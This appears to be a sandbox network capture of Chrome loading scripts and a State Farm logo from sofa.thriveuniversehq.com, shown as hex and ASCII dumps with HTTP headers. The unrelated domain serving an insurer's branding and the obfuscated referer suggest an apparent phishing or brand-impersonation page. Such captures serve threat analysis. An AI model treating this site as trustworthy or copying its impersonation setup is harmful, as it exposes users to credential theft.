                                                          2023-11-27 03:23:50 UTC737INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status:
                                                          2023-11-27 03:23:50 UTC632INData Raw: 32 66 30 0d 0a 76 61 72 20 63 73 73 20 3d 20 27 69 6d 67 2e 62 61 6e 6e 65 72 20 7b 20 5c 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 5c 0d 0a 09 74 6f 70 3a 20 30 3b 20 5c 0d 0a 09 77 69 64 74 68 3a 20 31 35 30 70 78 3b 5c 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 39 39 39 39 39 39 3b 5c 0d 0a 7d 5c 0d 0a 5c 6e 5c 0d 0a 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 35 30 30 70 78 29 20 7b 5c 0d 0a 09 69 6d 67 2e 62 61 6e 6e 65 72 20 7b 5c 0d 0a 09 09 77 69 64 74 68 3a 20 31 30 30 70 78 3b 5c 0d 0a 09 7d 5c 0d 0a 7d 5c 0d 0a 27 2c 0d 0a 68 65 61 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65
                                                          Data Ascii: 2f0var css = 'img.banner { \position: fixed; \top: 0; \width: 150px;\z-index: 999999999999;\}\\n\@media all and (max-width: 500px) {\img.banner {\width: 100px;\}\}\',head = document.head || document.getElementsByTagName
                                                          2023-11-27 03:23:50 UTC127INData Raw: 76 3d 31 22 3b 0d 0a 69 6d 67 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 62 61 6e 6e 65 72 27 3b 0d 0a 69 6d 67 2e 6f 6e 63 6c 69 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 74 68 69 73 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 20 7d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 29 3b 0d 0a
                                                          Data Ascii: v=1";img.className = 'banner';img.onclick = function () { this.style.display = 'none'; }document.body.appendChild(img);
                                                          2023-11-27 03:23:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.549738172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC464OUTGET /assets/images/State-Farm-Logo.png HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:51 UTC689INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 34 31 35 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 61 63 37 66 2d 36 30 38 39 30 32 65 34 39 35 37 35 34 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/pngContent-Length: 44159Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:05 GMTETag: "ac7f-608902e495754"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-
                                                          2023-11-27 03:23:51 UTC680INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0f 00 00 00 08 70 04 03 00 00 00 62 90 d6 41 00 00 00 15 50 4c 54 45 47 70 4c ed 1d 24 ee 1c 24 ee 1c 23 ee 1d 24 ee 1d 24 ed 1d 24 39 05 26 69 00 00 00 06 74 52 4e 53 00 d8 23 aa 4d 7b 33 4b 72 93 00 00 20 00 49 44 41 54 78 da ec c1 01 01 00 00 00 80 90 fe af ee 08 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: PNGIHDRpbAPLTEGpL$$#$$$9&itRNS#M{3Kr IDATx
                                                          2023-11-27 03:23:51 UTC1369INData Raw: 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                                                          Data Ascii: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                                                          2023-11-27 03:23:51 UTC1369INData Raw: 98 bc 88 b7 e3 a0 d3 0d 15 d1 5d d7 1c a5 4c 96 65 9b f2 15 9b fa 37 1a 1d e6 74 00 00 04 ea 42 34 9a fc ee 24 98 54 70 fb 2d 27 ca b2 b2 4c 9a f1 26 cf d3 4d aa 50 6b 9d 24 49 23 c3 34 53 03 00 c8 73 7f 63 bd 1d 13 1d e0 04 bf bf e3 d4 ea bb 9b 2c a6 5b 26 8b d5 bf ab 03 06 9a 00 00 48 93 86 65 31 ae fc ee e3 d0 19 4e f0 cb 11 ab fd 5c cf 9e 6e 6a dd 78 c2 4c d7 06 00 90 e3 fe 6e a7 00 27 f8 e5 88 b3 c1 19 f6 2a 48 37 0c 15 03 00 90 e0 9b 45 c5 08 b5 cf ed f5 d0 e9 1a 27 78 27 bf 65 6c 71 c6 0c 15 03 00 10 a1 bf e7 b7 fe 1e 91 e0 64 83 8e 98 ac b0 4e b0 d7 12 bc 41 82 01 00 bc 56 87 89 c2 cf 2f 61 68 e9 32 52 7b bf 27 dd 70 02 7a b9 c0 eb ab bf e2 0c 40 38 d1 ad de 4e 8b fe be 16 7e c1 39 35 c0 a0 5d 45 f0 55 84 ef bd 7b 39 38 86 91 78 19 3b b3 5e af b3
                                                          Data Ascii: ]Le7tB4$Tp-'L&MPk$I#4Ssc,[&He1N\njxLn'*H7E'x'elqdNAV/ah2R{'pz@8N~95]EU{98x;^
                                                          2023-11-27 03:23:51 UTC1369INData Raw: d7 c9 c6 a8 33 3e 66 61 86 b8 58 1e c6 39 af 56 1f de 7a 99 61 f2 eb 7b 71 8c c9 8a 78 50 f3 ba 80 79 60 4b 97 02 fc 07 01 06 31 0c 7a d5 aa 60 b3 3e 77 e7 ec c1 56 f3 ce 20 b4 57 f7 9b d9 27 1a d8 46 10 cc f0 fc c0 9d cf f2 1b 15 f1 b0 6b 88 84 36 55 b7 02 8c 55 06 29 0c da 41 a8 d3 6c 8c 4b a9 ca 06 79 5a 5e 05 a1 a3 d9 ab 59 ec c6 08 59 c8 af cf b9 39 13 95 c9 e0 63 10 30 0f cc e9 24 ca df 98 65 90 c2 ed 20 f7 77 ac 98 90 1a e4 04 fb 14 84 9e 7f a0 81 95 00 f7 b6 dc bc b9 19 79 2b c0 03 83 33 72 6a 84 be 30 89 12 60 86 50 53 bf 83 56 a5 67 47 9f df 04 fa b4 24 17 c3 41 28 cf c6 7c 5d 0d 8d ba fa 9d 9b 53 16 7d 72 32 e6 81 39 9d 44 f9 0f 76 19 64 30 a0 45 26 28 c7 9d 8d 11 0d 58 8c eb 8d ab a5 e6 77 80 2b 9b 0c a5 5d a4 d1 db dc 9c dd 35 49 42 91 ee 4f
                                                          Data Ascii: 3>faX9Vza{qxPy`K1z`>wV W'Fk6UU)AlKyZ^YY9c0$e wy+3rj0`PSVgG$A(|]S}r29Dvd0E&(Xw+]5IBO
                                                          2023-11-27 03:23:51 UTC1369INData Raw: b1 4c 97 1c 5c e0 40 68 87 73 0c 2c 64 d2 b2 55 ca db 2d 7c 3f 71 d0 de b3 72 29 c0 0b 2c 34 f8 4c d7 e0 81 96 00 b4 9a 42 7f 77 a5 58 87 6f 59 57 2a ee 02 73 42 0e d7 99 ff 39 ff 39 90 26 c0 76 ee 9e b7 f3 c0 4e 7f 32 9c 3d c1 00 17 48 57 13 70 70 78 b7 5f c6 53 5d 73 0f 15 b8 d3 21 bb b8 b2 53 97 cb dc 6c 04 98 f6 9b 13 04 58 c2 a0 c4 2b 04 18 60 2a 3a 22 d0 2d 73 97 a3 78 ba 40 d3 61 c3 71 b4 f2 24 26 e5 72 92 ee f5 64 7f 4d 5f 05 d8 d2 dd 93 d0 06 fc c9 e1 03 bc fd 8d 85 06 89 f1 a5 c3 ab fd 44 f1 e7 27 7f fb e1 fd e7 a9 8e 66 e0 8b db c8 e0 30 02 6d 35 89 d2 2e f7 e9 eb 1a 5c 4b 77 4f c2 9c a6 65 78 19 4f 30 c0 05 be 5d 1d 7e e6 81 cc 45 d3 46 52 0f b7 1e aa d8 8f 57 d2 65 17 e5 bf 67 3f 08 db ad 1f d7 a0 89 02 01 df fe 63 ef 6a ba db 44 96 68 5e 47
                                                          Data Ascii: L\@hs,dU-|?qr),4LBwXoYW*sB99&vN2=HWppx_S]s!SlX+`*:"-sx@aq$&rdM_D'f0m5.\KwOexO0]~EFRWeg?cjDh^G
                                                          2023-11-27 03:23:51 UTC1369INData Raw: af 46 54 30 1b ea 70 b1 35 58 af c0 23 56 96 86 b2 25 2c 27 22 60 44 1c e2 03 d1 60 5a d9 89 80 09 04 c4 ce 6a e5 4c 6c ce 0e fc 56 72 c1 cb 24 6d b8 a9 1b 3b 86 03 dc 7c 11 71 6b a1 21 09 1a ec 5d ff 75 75 4f d0 40 ce 1b 3c 4a 6e 5e 02 81 20 b8 b3 5a 67 7b 77 33 26 c0 1d 12 1a fb aa 4e b8 73 99 c4 6a 91 49 16 aa c1 4e ab ef 3d da 13 be cf e1 f8 85 30 e0 15 79 57 02 01 be b3 ee 25 43 5f 95 43 e8 5a b1 80 9d 32 17 6e 05 51 4d b6 f1 b3 9c 50 bc d7 9b a2 bb c9 36 f7 9e ba 09 58 17 21 81 40 b8 05 4f d7 fd 31 f2 ef a7 d4 a0 9f 9a 09 5e 68 63 05 2a f2 2e 42 5c fe f0 b0 95 21 60 60 b3 a7 ab 03 28 80 6f ec 9b 0f 7e e2 85 08 98 40 50 0f 1e a9 35 b3 ca 39 4b b0 6e d2 8b 17 1b 49 00 57 83 85 9d 32 75 5b 88 05 50 48 81 04 fc e4 e8 9e 00 06 9d 3e 10 30 26 8a bc 27 ef
                                                          Data Ascii: FT0p5X#V%,'"`D`ZjLlVr$m;|qk!]uuO@<Jn^ Zg{w3&NsjIN=0yW%C_CZ2nQMP6X!@O1^hc*.B\!``(o~@P59KnIW2u[PH>0&'
                                                          2023-11-27 03:23:51 UTC1369INData Raw: 16 59 9c 05 21 6e d4 e9 35 d5 be d2 7d 09 84 10 f1 69 60 2b 0d 36 bb a2 44 5c 94 80 1b 6a af 29 6d c0 2d 8e 65 a1 8e c1 8d fa 08 78 d6 f2 d1 45 b0 04 e8 d9 b0 5e 93 29 cf f8 56 8c 95 7f cf b6 27 74 8f 0d 1d fb f5 a5 07 ab 34 c5 3c ab eb 62 b3 f2 ff 9d cf 93 3a 35 cc 38 b7 a7 99 77 5e 69 31 a5 c9 4c ec 1b ae c7 bd 97 aa 80 b9 cc 7b 43 d8 61 19 4b 93 10 21 b1 d4 e6 51 d3 7d d2 a4 7b 50 4b 45 f4 59 76 bd 2b 8d 2b 8a 94 ac 44 fc 51 c9 9d d5 06 4b 24 cc c1 ff 60 f5 4e b3 4d e2 18 22 e0 a5 c9 2f f6 4e 2a da 90 de 05 29 e4 0c c8 b8 fe d7 6b 26 d1 40 1c 47 91 76 1e 06 12 b0 ee af 13 7d e4 52 ff 0c 3f 08 96 49 92 5f ce 93 65 c2 0f 16 11 70 d5 3e 7b 6e 19 cd 54 b1 ca 35 07 ad df 15 66 cb 2c d2 2d 38 1e 6f 7c 64 88 b7 cf e8 5c 12 e5 c7 97 2e 82 64 77 39 ca 2e 58 19
                                                          Data Ascii: Y!n5}i`+6D\j)m-exE^)V't4<b:58w^i1L{CaK!Q}{PKEYv++DQK$`NM"/N*)k&@Gv}R?I_ep>{nT5f,-8o|d\.dw9.X
                                                          2023-11-27 03:23:51 UTC1369INData Raw: 62 cd 59 c2 fc 94 4b 2d 19 ac 5e 80 af ca a7 7b 48 0a 0b 25 60 7e d6 cd f2 50 ee 01 d0 3c 5e fe 78 d9 51 0c f6 01 1b 39 88 c3 ae 49 58 18 02 3e e8 26 e0 50 fb fb 12 89 21 a2 58 81 f6 dc 5c 37 a8 08 6b 22 01 b3 58 26 b7 2b 96 7a 18 18 31 4f 55 93 15 47 0a b4 e7 4e 12 2c 23 1b dc c9 13 70 3c 12 82 76 ee 3c 81 8e 44 e1 66 dd 8b 93 f8 be 2b c4 44 e8 08 5a b6 40 17 25 f2 09 d8 c2 51 94 26 67 c0 b1 81 04 7c a7 fd 75 8d ff 04 c6 6e ef 3d 55 90 cf 40 84 2d fd b7 5d c3 df 24 4b 25 15 81 e5 ef 95 19 16 a3 63 53 f6 8f 58 92 79 49 32 d5 6b b0 c6 01 5e 3c 16 8f 75 9d 77 66 39 43 8b a0 7f 70 c9 12 f2 b5 5f 45 f6 54 0c d7 6d 96 bf 89 7e ad b9 0d c9 da cb 18 30 e2 9d fd 04 3c 5a 84 c5 94 ea 88 b8 a3 a5 85 79 04 2c cd bf 9a dc da ff d9 bb 96 ee c4 71 26 9a e3 c0 fe 83 98
                                                          Data Ascii: bYK-^{H%`~P<^xQ9IX>&P!X\7k"X&+z1OUGN,#p<v<Df+DZ@%Q&g|un=U@-]$K%cSXyI2k^<uwf9Cp_ETm~0<Zy,q&
                                                          2023-11-27 03:23:51 UTC1369INData Raw: 32 46 81 07 2b c1 ef a2 d8 6b 1a 9e bf 9e 0f cb a3 15 a1 9f 8d be 13 c6 7b 48 45 d3 bd e5 c6 2b 7e 00 ce fb cc 27 8e bd 0e e2 e5 bc b3 08 8d 29 1f 82 b6 c1 ee 1c 89 6e 46 23 f6 61 2d 89 a2 2a a1 04 ce 22 42 27 cf 40 b7 76 a8 c6 66 5e 62 7c 21 72 fa 96 39 36 54 c2 8d 55 fc 3e 9b 80 fe c2 d1 a5 0e 1d 74 1a e6 16 8e 8b 1b 72 1f 04 00 1f 8c df e8 f0 1f 00 07 06 c0 3d f9 72 5e b3 4b 32 00 b0 2c bc e0 a5 c0 00 d5 a2 1b 97 66 f3 ed 7a 4e 99 bb db 48 9b 82 5b b7 ed a1 6b 52 16 4b 9e a0 a1 c4 1b 2d 53 7d 52 8a b0 36 b6 3b ad ef ac fc 1a 61 33 8b 14 80 87 c6 7c 93 4d fc b1 cd 65 34 36 7f b8 b9 32 00 26 ee 2a db 72 9e 97 58 39 af 51 06 a5 8f ea 76 59 e0 e8 41 e0 18 c8 2d 66 22 ee 44 0c 29 b0 1b 9b fc 29 8b bb 00 f7 ca cb 7d be 93 29 ff f1 77 6a a2 8a d7 b9 6f 31 b1
                                                          Data Ascii: 2F+k{HE+~')nF#a-*"B'@vf^b|!r96TU>tr=r^K2,fzNH[kRK-S}R6;a3|Me462&*rX9QvYA-f"D))})wjo1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.549739104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3659OUTGET /assets/js/ads.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC725INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 37 61 39 35 2d 36 30 38 39 30 32 65 34 34 66 32 35 35 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:04 GMTETag: W/"7a95-608902e44f255-gzip"Vary: Accept-EncodingCache-Contro
                                                          2023-11-27 03:23:50 UTC644INData Raw: 37 61 39 35 0d 0a 76 61 72 20 41 44 53 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 61 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 61 29 26 26 28 65 5b 61 5d 3d 74 5b 61 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63
                                                          Data Ascii: 7a95var ADS=function(e){"use strict";var t=function(){return t=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var a in t=arguments[n])Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a]);return e},t.apply(this,arguments)};func
